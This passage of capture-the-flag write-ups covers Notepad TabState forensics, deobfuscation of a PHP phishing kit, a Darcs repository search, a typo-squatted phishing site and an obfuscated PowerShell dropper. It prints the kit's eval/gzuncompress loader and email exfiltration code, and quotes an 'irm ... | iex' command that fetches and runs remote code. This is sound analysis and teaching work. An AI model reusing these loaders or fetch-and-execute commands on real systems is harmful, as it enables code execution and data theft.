        ├── e6a849ab-6f02-452c-98e7-cdb03c577818.bin
        ├── e86c9910-afca-4e83-87f6-600ed08a0570.bin
        ├── ed9b5775-f35a-4770-a35e-e3c24b8bed47.bin
        └── f1473e57-7637-4bd0-8158-53715ea20630.bin

After manually reviewing several files using xxd, the flag is found in 2e0dd6b6-ba93-4efc-9fd4-985dad74869a.bin.

xxd C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe/LocalState/TabState/2e0dd6b6-ba93-4efc-9fd4-985dad74869a.bin
00000000: 4e50 0000 0100 0001 0000 0301 0101 0000  NP..............
00000010: 8120 48e2 0000 ba03 3dd8 96dc 3dd8 96dc  . H.....=...=...
00000020: 2000 4400 6100 7400 6500 2000 7700 6900   .D.a.t.e. .w.i.
00000030: 7400 6800 2000 4500 7200 6900 6300 2100  t.h. .E.r.i.c.!.
00000040: 2100 2100 2000 3dd8 96dc 3dd8 96dc 0d00  !.!. .=...=.....
00000050: 0d00 6f00 6d00 6700 6700 6700 6700 6700  ..o.m.g.g.g.g.g.
00000060: 2000 6900 2700 6d00 2000 7300 6f00 6f00   .i.'.m. .s.o.o.
00000070: 6f00 2000 6500 7800 6300 6900 7400 6500  o. .e.x.c.i.t.e.
00000080: 6400 2000 3dd8 0dde 0d00 6800 6500 2000  d. .=.....h.e. .
00000090: 6100 6300 7400 7500 6100 6c00 6c00 7900  a.c.t.u.a.l.l.y.
000000a0: 2000 6100 7300 6b00 6500 6400 2000 6d00   .a.s.k.e.d. .m.
000000b0: 6500 2000 6f00 7500 7400 2100 2100 2100  e. .o.u.t.!.!.!.
000000c0: 2000 6900 2000 6300 6100 6e00 2700 7400   .i. .c.a.n.'.t.
000000d0: 2000 6200 6500 6c00 6900 6500 7600 6500   .b.e.l.i.e.v.e.
000000e0: 2000 6900 7400 0d00 0d00 4400 6500 7400   .i.t.....D.e.t.
000000f0: 6100 6900 6c00 7300 2000 7300 6f00 2000  a.i.l.s. .s.o. .
00000100: 6900 2000 6400 6f00 6e00 1920 7400 2000  i. .d.o.n.. t. .
00000110: 6600 6f00 7200 6700 6500 7400 3a00 0d00  f.o.r.g.e.t.:...
00000120: 2d00 2000 7700 6800 6500 6e00 3a00 2000  -. .w.h.e.n.:. .
00000130: 7300 6100 7400 7500 7200 6400 6100 7900  s.a.t.u.r.d.a.y.
00000140: 2c00 2000 7300 6500 7000 7400 2000 3100  ,. .s.e.p.t. .1.
00000150: 3400 7400 6800 2c00 2000 3700 3a00 3000  4.t.h.,. .7.:.0.
00000160: 3000 7000 6d00 0d00 2d00 2000 7700 6800  0.p.m...-. .w.h.
00000170: 6500 7200 6500 3a00 2000 5300 7400 6100  e.r.e.:. .S.t.a.
00000180: 7200 6200 7500 6300 6b00 7300 2000 6f00  r.b.u.c.k.s. .o.
00000190: 6e00 2000 4d00 6100 6900 6e00 2000 5300  n. .M.a.i.n. .S.
000001a0: 7400 7200 6500 6500 7400 2000 1526 0d00  t.r.e.e.t. ..&..
000001b0: 2d00 2000 6100 6600 7400 6500 7200 2000  -. .a.f.t.e.r. .
000001c0: 6d00 6100 7900 6200 6500 2000 6d00 6f00  m.a.y.b.e. .m.o.
000001d0: 7600 6900 6500 2000 6100 7400 2000 7400  v.i.e. .a.t. .t.
000001e0: 6800 6500 2000 7000 6c00 6100 7a00 6100  h.e. .p.l.a.z.a.
000001f0: 2000 3cd8 acdf 0d00 0d00 6200 7400 7700   .<.......b.t.w.
00000200: 2000 7400 6800 6500 2000 7700 6900 6600   .t.h.e. .w.i.f.
00000210: 6900 2000 6100 7400 2000 7400 6800 6100  i. .a.t. .t.h.a.
00000220: 7400 2000 7300 7400 6100 7200 6200 7500  t. .s.t.a.r.b.u.
00000230: 6300 6b00 7300 2000 6900 7300 2000 7300  c.k.s. .i.s. .s.
00000240: 6f00 6f00 6f00 6f00 2000 7700 6500 6900  o.o.o.o. .w.e.i.
00000250: 7200 6400 2c00 0d00 7400 6800 6500 7900  r.d.,...t.h.e.y.
00000260: 2000 7400 6f00 6c00 6400 2000 6d00 6500   .t.o.l.d. .m.e.
00000270: 2000 7400 6800 6500 2000 7000 6100 7300   .t.h.e. .p.a.s.
00000280: 7300 7700 6f00 7200 6400 2000 6900 7300  s.w.o.r.d. .i.s.
00000290: 3a00 2000 6600 6c00 6100 6700 7b00 3100  :. .f.l.a.g.{.1.
000002a0: 3600 3500 6400 3100 3900 6200 3600 3100  6.5.d.1.9.b.6.1.
000002b0: 3000 6300 3000 3200 6200 3200 3800 3300  0.c.0.2.b.2.8.3.
000002c0: 6600 6300 3100 6100 3600 6200 3400 6100  f.c.1.a.6.b.4.a.
000002d0: 3500 3400 6300 3400 6100 3500 3800 7d00  5.4.c.4.a.5.8.}.
000002e0: 0d00 0d00 6800 6500 1920 7300 2000 7300  ....h.e.. s. .s.
000002f0: 6f00 6f00 6f00 2000 6300 7500 7400 6500  o.o.o. .c.u.t.e.
00000300: 2100 2100 2100 2000 6900 2000 7700 7200  !.!.!. .i. .w.r.
00000310: 6f00 7400 6500 2000 6900 7400 2000 6100  o.t.e. .i.t. .a.
00000320: 6c00 6c00 2000 6400 6f00 7700 6e00 2000  l.l. .d.o.w.n. .
00000330: 6a00 7500 7300 7400 2000 6900 6e00 2000  j.u.s.t. .i.n. .
00000340: 6300 6100 7300 6500 2000 6900 2000 6600  c.a.s.e. .i. .f.
00000350: 6f00 7200 6700 6500 7400 2000 6c00 6f00  o.r.g.e.t. .l.o.
00000360: 6c00 0d00 6300 6100 6e00 1920 7400 2000  l...c.a.n.. t. .
00000370: 7700 6100 6900 7400 2100 2100 2000 3dd8  w.a.i.t.!.!. .=.
00000380: 95dc 3dd8 95dc 3dd8 95dc 0d00 c357 03ed  ..=...=......W..

Alternatively, with the encoding set to 16-bit big endian, strings can be used to search all of the files for the flag.

strings -e b C/Users/Tabby/AppData/Local/Packages/Microsoft.WindowsNotepad_8wekyb3d8bbwe/LocalState/TabState/* | grep -i flag
flag{165d19b610c02b283fc1a6b4a54c4a58}
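The hex dump shows the note stored as UTF-16LE (each ASCII byte followed by 0x00). The following added Python helper, which is not part of the writeup, is a small equivalent of the strings-and-grep step: it pulls printable UTF-16LE runs out of a blob and searches them for the flag pattern. It runs here on a constructed sample that mimics the TabState layout with a placeholder flag value.

```python
import re

FLAG_RE = re.compile(r"flag\{[a-z0-9]{32}\}")


def utf16le_strings(data: bytes, min_len: int = 4):
    """Yield runs of printable UTF-16LE text from a blob (a strings -e l equivalent).

    A code unit is accepted when its high byte is 0 and its low byte is printable
    ASCII (tab, CR and LF included, so multi-line notes stay in one run). Both byte
    alignments are scanned, so text is found whether or not it starts on an even
    offset. Non-ASCII characters such as the emoji in Tabby's note end a run, which
    is why the flag search below is done per run rather than on the whole blob.
    """
    for start in (0, 1):
        run = []
        for i in range(start, len(data) - 1, 2):
            lo, hi = data[i], data[i + 1]
            if hi == 0 and (0x20 <= lo < 0x7F or lo in (0x09, 0x0A, 0x0D)):
                run.append(chr(lo))
                continue
            if len(run) >= min_len:
                yield "".join(run)
            run = []
        if len(run) >= min_len:
            yield "".join(run)


def find_flags(data: bytes) -> list:
    """Return every flag-shaped string found in the UTF-16LE text of a blob."""
    return [m for s in utf16le_strings(data) for m in FLAG_RE.findall(s)]


# Constructed sample (not the real TabState file): the "NP" magic and a few header
# bytes as seen in the xxd output, then a note body as UTF-16LE containing an emoji
# and a placeholder flag value.
NOTE = ("Date with Eric!!! \U0001F496\r\n"
        "- when: saturday, sept 14th, 7:00pm\r\n"
        "the password is: flag{00112233445566778899aabbccddeeff}\r\n")
SAMPLE = b"NP\x00\x00\x01\x00\x00\x01\x00\x00\x03\x01\x01\x01\x00\x00" + NOTE.encode("utf-16-le")


if __name__ == "__main__":
    for s in utf16le_strings(SAMPLE):
        print(repr(s))
    print(find_flags(SAMPLE))
```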

Day 10

For Greatness

Category: 🐞 Malware
Author: John Hammond

Challenge Prompt

Oh great, another phishing kit. This has some functionality to even send stolen data over email! Can you track down the email address they send things to?

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

The password to the archive is infected. Uncover the flag from the file provided.

📄 for_greatness.zip - 130 KB

Solution

The provided zip file contains an obfuscated PHP file, j.php. The original file is primarily written on a single line. Using the semicolons as a separator, the formatting can be cleaned up to make the file more readable. The script uses a series of goto operators and randomly named target labels and variables to jumble things, making it more difficult to read. Additionally, the strings appear to be a mix of octal and hexadecimal encoded characters.

<?php
goto oxiT1;
KC3di: $sl5eq = $lFKwz($sl5eq);
goto m4J3j;
zEIti: $GGMnR = $sl5eq();
goto g0hmD;
m4J3j: $VhLHm = $lFKwz($VhLHm);
goto NmVIQ;
g0hmD: $AQTh0();
goto FkkRP;
C9ufu: $d8Mzs($fPdlo($lFKwz($FRczk)));
goto zEIti;
yLDSn: $VhLHm = "\x20\40\142\x32\112\x66\x63\x33\x52\x68\x63\156\121\x3d";
goto vZvXQ;
vZvXQ: $sl5eq = "\x62\62\x4a\146\132\x32\126\60\130\62\116\x76\142\156\122\x6c\142\156\x52\x7a";
goto lo0I_;
ddvsq: $fPdlo = $lFKwz($fPdlo);
goto CcPTn;
G3Rr2: $VhLHm();
goto C9ufu;
a4yHD: $fPdlo = "\40\x5a\63\160\x31\x62\x6d\116\x76\x62\x58\x42\x79\132\x58\x4e\172";
goto yLDSn;
zFUky: $OovTE = $lFKwz($OovTE);
goto Cciv0;
fDcHz: $AQTh0 = $lFKwz($AQTh0);
goto KC3di;
Cciv0: $d8Mzs = $iQPa4("\44\137", $OovTE);
goto fDcHz;
CMzN3: $iQPa4 = "\130\x31\71\x73\x59\127\x31\151\132\x47\x45\x3d";
goto a4yHD;
CcPTn: if (!function_exists("\137\x5f\154\x61\x6d\x62\x64\141")) {
  function __lambda($sZ_lH, $AP_tK) {
    return eval("\x72\x65\164\165\x72\x6e\40\146\x75\156\143\x74\x69\157\156\x28{$sZ_lH}\51\x7b{$AP_tK}\x7d\x3b");
  }
}
goto oSLxJ;
NmVIQ: $FRczk = "\145\112\172\164\57\126\154\172\64\164\162\127\71\167\166\145\156\60\71\122\106\170\130\170\126\163\127\165\161\101\145\102\171\132\63\105\151\130\116\150\104\115\112\147\111\171\143\103\151\145"; // Truncated
goto G3Rr2;
HV0Iz: $AQTh0 = "\40\40\x20\x20\x62\x32\x4a\x66\x5a\127\x35\x6b\130\x32\116\163\132\127\x46\165";
goto IXsP0;
lo0I_: $lFKwz = "\x62\x61\163\145\x36\64\x5f\144\145\143\157\144\x65";
goto ddvsq;
oSLxJ: $iQPa4 = $lFKwz($iQPa4);
goto zFUky;
cdhu8: $FRczk = "\114\x6f\141\144\151\x6e\147\40\103\154\141\x73\163\57\x43\157\x64\145\x20\x4e\x41\x4d\105";
goto HV0Iz;
IXsP0: $OovTE = "\x63\x6d\x56\x30\144\x58\112\x75\111\107\x56\62\x59\127\167\157\x4a\106\70\160\x4f\167\75\75";
goto CMzN3;
oxiT1: $lFKwz = "\x70\x72\151\156\x74\x66";
goto cdhu8;
FkkRP: echo $GGMnR;

After restructuring the script by following the goto operators and decoding the strings, the following is the result. Several of the decoded strings are base64 encoded.

<?php
$lFKwz = "printf";
$FRczk = "Loading Class/Code NAME";
$AQTh0 = "    b2JfZW5kX2NsZWFu";
$OovTE = "cmV0dXJuIGV2YWwoJF8pOw==" ;
$iQPa4 = "X19sYW1iZGE=";
$fPdlo = " Z3p1bmNvbXByZXNz";
$VhLHm = "  b2Jfc3RhcnQ=";
$sl5eq = "b2JfZ2V0X2NvbnRlbnRz";
$lFKwz = "base64_decode" ;
$fPdlo = $lFKwz($fPdlo);
if (!function_exists("__lambda")) {
  function __lambda($sZ_lH, $AP_tK) {
    return eval("return function(" . $sZ_lH . "){" . $AP_tK . "};");
  }
}
$iQPa4 = $lFKwz($iQPa4);
$OovTE = $lFKwz($OovTE);
$d8Mzs = $iQPa4('$_', $OovTE);
$AQTh0 = $lFKwz($AQTh0);
$sl5eq = $lFKwz($sl5eq);
$VhLHm = $lFKwz($VhLHm);
$FRczk = "\145\112\172\164\57\126\154\172\64\164\162\127\71\167\166\145\156\60\71\122\106\170\130\170\126\163\127\165\161\101\145\102\171\132\63\105\151\130\116\150\104\115\112\147\111\171\143\103\151\145"; // Truncated
$VhLHm();
$d8Mzs($fPdlo($lFKwz($FRczk)));
$GGMnR = $sl5eq();
$AQTh0();
echo $GGMnR;

The FRczk variable contains a long, octal encoded payload. After decoding several of the base64 encoded strings, it appears the payload is effectively base64 decoded, uncompressed, and executed.

eval(gzuncompress(base64_decode($FRczk)));
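The string decoding can be scripted rather than pasted into CyberChef. The following added Python helper (not part of the writeup) decodes PHP's \xHH and \OOO escapes and, where the result is well-formed base64 that decodes to text, the layer underneath; the strings it runs on are copied from the obfuscated script above.

```python
import base64
import re

# Escapes PHP honours inside double-quoted strings: \xHH (1-2 hex digits),
# \OOO (1-3 octal digits) and the single-character escapes below. Any other
# backslash sequence is kept literally, which is also PHP's behaviour.
_ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$\"])")
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
           "f": "\f", "\\": "\\", "$": "$", '"': '"'}


def php_unescape(s: str) -> str:
    """Decode the \\xHH and \\OOO escapes that j.php uses for every string."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        if tok[0] in "01234567":
            return chr(int(tok, 8) & 0xFF)   # PHP wraps octal values above \377
        return _SIMPLE[tok]
    return _ESCAPE_RE.sub(repl, s)


def maybe_base64(s: str):
    """Heuristic: decode s as base64 when it is well-formed and yields UTF-8 text, else None."""
    candidate = s.strip()
    if not candidate or len(candidate) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", candidate):
        return None
    try:
        return base64.b64decode(candidate, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_layer(s: str) -> str:
    """Undo the escape layer, then the base64 layer where one is present."""
    plain = php_unescape(s)
    inner = maybe_base64(plain)
    return plain if inner is None else inner


# Strings copied from the obfuscated script above, keyed by the variable they land in.
STRINGS = {
    "$lFKwz (first)":  r"\x70\x72\151\156\x74\x66",
    "$lFKwz (second)": r"\x62\x61\163\145\x36\64\x5f\144\145\143\157\144\x65",
    "$iQPa4": r"\130\x31\71\x73\x59\127\x31\151\132\x47\x45\x3d",
    "$OovTE": r"\x63\x6d\x56\x30\144\x58\112\x75\111\107\x56\62\x59\127\167\157\x4a\106\70\160\x4f\167\75\75",
    "$fPdlo": r"\40\x5a\63\160\x31\x62\x6d\116\x76\x62\x58\x42\x79\132\x58\x4e\172",
    "$VhLHm": r"\x20\40\142\x32\112\x66\x63\x33\x52\x68\x63\156\121\x3d",
    "$sl5eq": r"\x62\62\x4a\146\132\x32\126\60\130\62\116\x76\142\156\122\x6c\142\156\x52\x7a",
    "$AQTh0": r"\40\40\x20\x20\x62\x32\x4a\x66\x5a\127\x35\x6b\130\x32\116\163\132\127\x46\165",
}

if __name__ == "__main__":
    for name, raw in STRINGS.items():
        print(f"{name:18} {php_unescape(raw)!r:34} -> {decode_layer(raw)!r}")
```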

Using CyberChef to reverse this process and clean up the result, there is another large base64 encoded payload stored in the $___________ variable.

$____ = 'printf';
$___________ = 'Class/Code NAME Class...';
$___ = 'X19sYW1iZGE=';
$______ = 'cmV0dXJuIGV2YWwoJF9fXyk7';
$____ = 'base64_decode';
$___________ = 'CkBzZXNzaW9uX3N0YXJ0KCk7CmhlYWRlcignQWNjZXNzLUNvbnRyb2wtQWxsb3ct...'; // Truncated
$______ = $____($______);
$___ = $____($___);
$_____ = $___('$___', $______);
$_____($____($___________));

The decoded result of the second payload contains a large amount of PHP and HTML. The challenge prompt suggests looking for an email address. After searching through the PHP, the flag appears to be included in the From address in the disp::mailTo function.

class disp {
	...omitted...

	public function mailTo($add,$cont){
		$subject='++++Office Email From Greatness+++++';
		$headers='Content-type: text/html; charset=UTF-8' . "\r\nFrom: Greatness <ghost+}f7113307018770d52d4f94fec013197f{[email protected]>" . "\r\n";
		@mail($add,$subject,$cont,$headers);
	}

	...omitted...
}

Reversing the email address reveals the flag.

flag{f791310cef49f4d25d0778107033117f}

Day 20

Darcy

Category: 🔍 Forensics
Author: John Hammond

Challenge Prompt

Darcy has apparently been having a lot of fun with a unique version control system.

She told me she hid a flag somewhere with her new tool and wants me to find it… I can’t make any sense of it, can you?

📄 darcy.tar.gz - 7.61 MB

Solution

The provided tar.gz file contains a Darcs repository. The repository contains a large number of patches, which are similar to commits in a Git repository. All patches can be listed using the log command. This presents information about each patch, including the author, date and time, and comment.

darcs log

Since this repository contains many patches, the log command displays the results using less. The results can be searched using the / command. Searching for the term flag finds the patch below.

patch b7b8767c2e09faf049a37d74315325f34e9d0fd8
Author: [email protected]
Date:   Tue Sep 30 02:18:27 EDT 2025
  * routine update; details: flag{a0c1e852e1281d134f0ac2b8615183a3}
flag{a0c1e852e1281d134f0ac2b8615183a3}

Day 21

Follow The Money

Category: 🕵️ OSINT
Author: @Brady

Challenge Prompt

Hey Support Team,

We had a bit of an issue yesterday that I need you to look into ASAP. There’s been a possible case of money fraud involving our client, Harbor Line Bank. They handle a lot of transfers for real estate down payments, but the most recent one doesn’t appear to have gone through correctly.

Here’s the deal, we need to figure out what happened and where the money might have gone. The titling company is looping in their incident response firm to investigate from their end. I need you to quietly review things on our end and see what you can find. Keep it discreet and be passive.

I let Evelyn over at Harbor Line know that someone from our team might reach out. Her main email is offline right now just in case it was compromised, she’s using a temporary address until things get sorted out:

[email protected]

IMPORTANT

This challenge uses a non-standard flag format.

NOTE

The password to the ZIP archive below is follow_the_money.

📄 follow_the_money.zip - 207 KB

Solution

The provided zip file contains five emails which appear to be between Evelyn Carter ([email protected]) and Justin Case ([email protected]). The first four emails appear to be legitimate. Justin directs their partners to make transfers using the link in his email signature, https://evergatetitle.netlify.app/. In the fifth email, the sender claims the payment has not been received and requests that Evelyn resend it using the link in the signature, https://evergatetltle.netlify.app/. This URL differs by a single character from the one in the previous communications from Justin.

Phishing email

After reviewing the markup of the impersonated site, https://evergatetltle.netlify.app/, the following message is found, which contains a base64 encoded string.

<div id="transferThankYouModal" class="fixed inset-0 w-full h-full flex items-center justify-center modal-overlay hidden z-50">
  <div class="bg-white rounded-lg shadow-2xl p-8 w-full max-w-2xl m-4 text-center">
    <h2 class="text-3xl font-bold text-gray-800 mb-4">Details Submitted</h2>
    <p class="text-lg text-gray-600">Thanks for giving me your bank! Your friend,
      aHR0cHM6Ly9uMHRydXN0eC1ibG9nLm5ldGxpZnkuYXBwLw==
      Retrieval ID: 471082</p>
    <button id="closeTransferThankYou" class="mt-6 bg-gray-700 text-white font-bold py-2 px-6 rounded-lg hover:bg-gray-600 transition">Close</button>
  </div>
</div>

Decoding the base64 string from this message reveals a URL: https://n0trustx-blog.netlify.app/.

n0trustx blog webpage

The footer of this page contains a link to a GitHub profile that contains a single repository: https://github.com/N0TrustX/Spectre. The repository contains a README.md file that says to open spectre.html in the browser and submit the “Retrieval ID”. The ID 471082 was found alongside the base64 encoded URL.

Reviewing spectre.html, the following base64 encoded payload is quickly found.

<!-- The Base64 encoded object is stored here, hidden from view -->
<div id="encodedPayload" class="hidden">ZmxhZ3trbDF6a2xqaTJkeWNxZWRqNmVmNnltbHJzZjE4MGQwZn0=</div>

Decoding the base64 encoded string reveals the flag.

flag{kl1zklji2dycqedj6ef6ymlrsf180d0f}

Day 24

Lizard

Category: 🐞 Malware
Author: Adam Rice

Challenge Prompt

Erm, what the sigma?

We saw this strange PowerShell string on one of our hosts, can you investigate and figure out what this does?

irm biglizardlover.com/gecko | iex

CAUTION

This is the Malware category, and as such, includes malware.

Please be sure to analyze these files within an isolated virtual machine.

Lizard GIF

Solution

The challenge prompt provides the following PowerShell string. irm is an alias for Invoke-RestMethod, which will make an HTTP GET request to the specified URL. iex is an alias for Invoke-Expression, which will execute the script fetched from the URL.

irm biglizardlover.com/gecko | iex

The script returned by this URL is included below. The initial part of this script evaluates to iex. The second part of this script is an obfuscated script that is passed as an argument to iex. The script is XORed using the key 0x2c.

.( ([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN'') ( ( '12G10G4}12I8b73G98G122&22&111f99f65f95G92,73f79,119,24&0y30z26f0,30&25,113y1z70G99I101I98b11z11&5,12f4&98G73z91}1z99f78z70y73}111y120y12r12}69f67I2I79&99&97,92G94G105z95}127,101z67r66b2,104}105r74I64f109z120y73f127b88I94y73}109G97y4I12}119&69,67}2z65f105r65y67r126y85y127G120,94I105r77I65y113f119b111b99,66z122f105r94,88r113y22r22,106r94b67&65z78I109&95&105f26y24}127z88f126&101&66G107G4y11b72&122&122,78}120b7b98y107&106I100I27,66z122&24&85z69z64f121r24&95z84z88r66,117z105}106}103&111r73&97b69&107z78r101z64y103&101f105G29}75f93f118I92G107b91}88G75b66,118I92}94I84&30f110f30z124&125y27,103y89y3r31,88z29,84&89z117I65G28G126y72}94z96r89&74&30r66r74G65r7I24f91f121f77,72b30z101b91,65G73}71f28G125b30}31b30G94,98,29r89&88&20r92f73z122y116z92b122b73b122,85I122I31I77}67G20}93}71&93&3G77y70r106f31f86}121r109&85y24&103f111b109}75z91r125}99r95I28I111r68G31}124z120f100I105}30r122z125I93z20f111}101r122r109}116I109r91z73&75r121I99&106,86}7&98,94z67,78y78z124r94I70f121f125I93I99z91I21G86G25b99f102z124y104&79y97I84}75b28}84}20G104&116y24}77&116b75&122G26f72f7I75z25z86y94r24z97G105z123,78&88f106&30f78r92f122r69z31&103&79}109I66&3&72z30b26f125G21r24G102}110}27r66&67}31G86}101f25r111r106,88&74}72y88G77b122y25,70r67r69b124b75I28&109y105y99I122,7r102y66r109&97f24,118I123I31b85z103f93&66}117y26y93I68b92G24b74,117I90&91I84,97G77f109r105G116G109z75&125y106y98y78,124}100y111z24r107I28G91r21b100}86z70I121f20r101G104&104f103f106y122z107y92z25,96I98&85I98}103r69G92f127,25G24G124f68y116&107}116r101G28f86r107,117G86y107r27,73z116&67}79b93f68&116,3I74r25G68b90z120f75z7,78z126b77b21I94f95I124,94G29f74I3y75I124}89z93&72I105&64}109y74,31,95I124&95z121f89b20z102f102,64I64z79f109z125}79G72I105y121}85I96G20f65}109,117b126r73&27y88r124y71b97z107b126f127f25I121&86&110}78,27r31z107&110G85r21}66,27G120G65,126z74f103,69b109b125y27f106}71&123f77r96f122,110I90,126r117r70z25z123y122G117f20b127y68}107,85r121}109I118G25z86&89f78y64r20r71r96y103G127&118I103G64G30&9
4I126f78b126y117I27r26b85f99,21,105G121,94f78&24r109b95f29z122f71I102I89I84r29r93f71f7r98b27,92G109b118&21}122&24G25G69,117b91f101,65f127}24b67b7I26f91f69r120y101z86f67y21,71,111&122}120G120r106f124}109y21r69b90I110y121y102G92f67f122f92z98&86}72f124y21I85&94I69&125f68y71z30r86y123,124f73b66}104,31I124b109r68I28z71f124I104f73I77r111&92G78,29}70y65r86b123f84}116r79r118}84y96y64&72}106&28}28z75&66r68f78&65y102z117b31b97z67I89z79,25z25y67b121f28,86&64r71r106z27&101G91G88G25}26r90,110z24}102r124}71}127&26y106y97G118G90f127&93z89f29b89I90&29f30z90r73b31z116&64G104b90&93y85f104,94,109}77,104,124I29I107,66G100y27}68b65y77G120r29I126&110z68G86,89y20y29f26y31f30y7r122z96f70r73G90f122}77r25z70z77}84z116r100f117&90}7,85f65b97y99b25&29y101,73r116I110}100}107r99G126I107r21y120,89&101z66,86}111z93I102,109&117y31}125b78r25,68z94,66&28y74r116,64y71b31f25I96z89&70b72y96}90G31G68z28f85b117I64G99b24z103b79G104}68f101z124I74&74f75b97I97f21I109,75,74r79&105G109b20r89}97I109G7f29I85y101f68r95&25}100I126r77r64G72,25&102,122G116z93f29r98}104,28,127y75,106y7r122y90,29&127b64,126}21r89r77I29}31r120y117G73b20b66y116z102G31G93z3&93I90G72b102y92}99z93y72f74z64z64&110z66b31z98r107r79&95I30G110r125}24r105&77G100}85z65b31,7z101,72z71I78,104&109}31b102z124y79G29f30G120G25b127G127r79I104&68b78y91r86,102&89I71b68&125z94,28r66f95G68z85r85I28f97r72,71z68z91G117r69f31G75}127}85G67}27G65y106f117,64I31z85I98&86&84}3y27y28f64f85z24f24b84&30r107z68z116I64&120y125,106b97&70f124&111,106,64f85,21z102}66}29f106I127}127G27,99}109r99y78I121,109y72y106I91f71G93y121z7I89b117z71y102r7I20}111y94b66}116f24I103G21b78,24r124f123r88&118b105f27&94f90b90&69f30I110}28r31r104r93G104,123G98y30,94z89I122&66&123b125,126z117y121,20r111G106r72f107}99I103y92I90}126&109r127b95r92I88&77,111&123}109y101I72z117G69f92&7z110I70}93r127y21,67f120&26I121G116G69,122r28,109I68r91f95b111G89,111,91r126z72f28I102f28,7r126f94&70z99,107,107z94}97r70I86G73f123,100z30b71}70b93b123f71}79&104G79b73r86r67G96G21,7b86}78I66&89r25,84f122G31I67G122&68}78b9
5,121y121&117b127z103z89r77,97z28r95r73z124z88z7}31y102y105}71z21,100}86z70r30y64b123z110&100I92z29}72}105f86y100b88I29z94z105&97f73y92f124G7,90,64b85y24I91,27G98}122&126}94b74I103y101I73b25f97r85b29}121I103,96G102z109I74G65f96&7r72r89y74y73r25b77}75G66f105,123b88G21y125z78}121G72G31G111G31G107G20G24I89b78&26I116z110b85}3b72f74&94z3b66r67,24}100}78f73G117I73y25I116&107&93f78&102z120}92&66&24&94r3f86&97b123I97G91b68b111r101r27z77&105,122,84G99z126&127b121y98r105z107z102r94,20I68f78G94f111}96y79I67y31r79I7y92f3b78&88b25G98y73,74I101I116f20y126&98b25f116,24y96,86G121z122y25f111r102,24}29b66&86}7y117z7,95,95G21r24I116&105G72&102&105,84&89r64b3,68f107}24}77z31I75I121b95&73y123I30&121y25&98,122z72y20}102}31G21I29I117&111&116&30}98b110z110z109y90G109y7b118r69&7&74y89f107,88y74r120f84y78y75f97r104y72z91b118z72f85z72,103,124}85&68z27f95G92&86I88r79I124r91&24y74I106y91}7&116I71G126f64y116&95z90I102z107}28}21&28b96z111r94r69,31,89,89r110r66r70&88,20y104&110&85I90f75,124y71&90z77b90y29I101}70b118&27f7&74}66I72,102I103r126b122I103r118,70f27r7f125}89b97z120G79&3b91G104I66&24}104z91z17z17I11G5,12r0z119z95z85r127b120&73&97G2r101}67f2}79b99}65b124}94G105&127G127,69G67&66f2z79y67y97r124z94}73G95I127z69&67z98z65,67,104z105b113,22z22I72b105b111,99G65}92b94y73z95}127r12&5b12,80z106z67y94&105f109f111}68b1G99I110z102f73r111f120z12&87&12&98G73G91z1,99f78,70I73}111y120y12G12f101f67&2I95b120&94r73y77r65z94,105b77&72r105r126&4r12z8I115z0b119,120}105z84,88G2}105z66f79,67,72f101r66}75,113r22f22z109z95}79r69z69}5y12f81b80b106b67&94z105}77,111I100y1b99,78I102f73z111z88f12&87&12G8r115,2y126f105b109b104G120,67&73I98}72,4G5}81I12,5}12'-SPlIT 'g' -spLiT'R'-sPLiT '&'-SplIt ','-sPlIt 'Y'-SplIT 'z'-SPLIT '}' -sPlIT 'i'-SpliT 'F' -SPLit'b'|% { [CHar]( $_ -bxoR 0x2c ) } )-jOIN'')

The following is the result of deobfuscating the script contained within the previous script. Again, the initial part of this script evaluates to iex. The second part of the script base64 decodes, then uncompresses another script that is passed to iex.

&( $eNV:COmspec[4,26,25]-jOIN'') (New-ObjeCT io.cOMprEsSIon.DEflATeStreAM( [io.mEmoRySTrEam][COnVErt]::FrombAsE64StRInG('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') ,[sySTeM.Io.cOmPrESSion.coMPresSioNmoDE]::dECOmpresS ) |ForEACh-OBJeCT { New-ObjeCT Io.sTreamrEadER( $_,[TExt.EncodIng]::Ascii) }|ForEaCH-ObJeCt { $_.READToeNd()} )

After decoding and uncompressing the data, the following is the resulting script.

Set-ItemProperty ((("{5}{1}{4}{0}{3}{2}" -f 'l ','n','l','Panelk7EInternationa','tro','HKCU:k7ECo')) -REplAcE 'k7E',[cHar]92) -Name ("{1}{0}"-f '9',("{1}{0}" -f '5','s11')) -Value ("{2}{0}{1}" -f 'rd','.','Liza'); Set-ItemProperty ((("{2}{0}{3}{5}{1}{7}{4}{6}" -f'C','anelM','HK','U:M12','Intern','Control P','ational','12'))  -rePlaCE([CHAr]77+[CHAr]49+[CHAr]50),[CHAr]92) -Name ("{1}{0}"-f '359','s2') -Value ("{0}{2}{1}"-f 'L','rd.','iza')
Add-Type 'using System;using System.Runtime.InteropServices;public class R{[DllImport("user32.dll",SetLastError=true)]public static extern IntPtr SendMessageTimeout(IntPtr hWnd,int Msg,IntPtr wParam,string lParam,int fuFlags,int uTimeout,out IntPtr lpdwResult);}' ; [R]::SendMessageTimeout([intptr]0xffff,0x1A,[IntPtr]::Zero,("{1}{0}" -f'l','Int'),2,5000,[ref]([intptr]::Zero)) | Out-Null
